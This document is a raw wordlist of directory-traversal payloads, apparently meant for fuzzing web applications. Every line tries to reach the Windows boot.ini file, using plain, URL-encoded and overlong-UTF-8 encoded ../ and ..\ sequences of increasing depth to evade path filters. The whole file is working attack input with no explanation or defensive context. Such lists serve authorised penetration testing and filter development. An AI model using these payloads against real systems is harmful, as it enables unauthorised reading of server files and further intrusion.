c:\boot.ini
c:\\boot.ini
\boot.ini
/boot.ini
c:/boot.ini
c://boot.ini
..\boot.ini
..\..\boot.ini
..\..\..\boot.ini
..\..\..\..\boot.ini
..\..\..\..\..\boot.ini
..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
%2E%2E\%2E%2E\%2E%2E\%2E%2E\%2E%2E\%2E%2E\%2E%2E\%2E%2E\boot.ini
%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cboot.ini
%C0AE%c0AE\%C0AE%c0AE\%C0AE%c0AE\%C0AE%c0AE\%C0AE%c0AE\%C0AE%c0AE\%C0AE%c0AE\%C0AE%c0AE\boot.ini
%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19Cboot.ini
%F080AE%F080AE\%F080AE%F080AE\%F080AE%F080AE\%F080AE%F080AE\%F080AE%F080AE\%F080AE%F080AE\%F080AE%F080AE\%F080AE%F080AE\boot.ini
%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819Cboot.ini
\%2E%2E\%2E%2E\%2E%2E\%2E%2E\%2E%2E\%2E%2E\%2E%2E\%2E%2E\boot.ini
%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cboot.ini
\%C0AE%c0AE\%C0AE%c0AE\%C0AE%c0AE\%C0AE%c0AE\%C0AE%c0AE\%C0AE%c0AE\%C0AE%c0AE\%C0AE%c0AE\boot.ini
%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19Cboot.ini
\%F080AE%F080AE\%F080AE%F080AE\%F080AE%F080AE\%F080AE%F080AE\%F080AE%F080AE\%F080AE%F080AE\%F080AE%F080AE\%F080AE%F080AE\boot.ini
%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819Cboot.ini
c:/boot.ini
c://boot.ini
/boot.ini
/boot.ini
c:/boot.ini
c://boot.ini
../boot.ini
../../boot.ini
../../../boot.ini
../../../../boot.ini
../../../../../boot.ini
../../../../../../boot.ini
../../../../../../../boot.ini
../../../../../../../../boot.ini
../../../../../../../../../boot.ini
../../../../../../../../../../boot.ini
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini
%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cboot.ini
%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/boot.ini
%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19Cboot.ini
%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/boot.ini
%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819Cboot.ini
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini
%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cboot.ini
/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/%C0AE%c0AE/boot.ini
%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19C%C0AE%c0AE%C19Cboot.ini
/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/%F080AE%F080AE/boot.ini
%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819C%F080AE%F080AE%F0819Cboot.ini
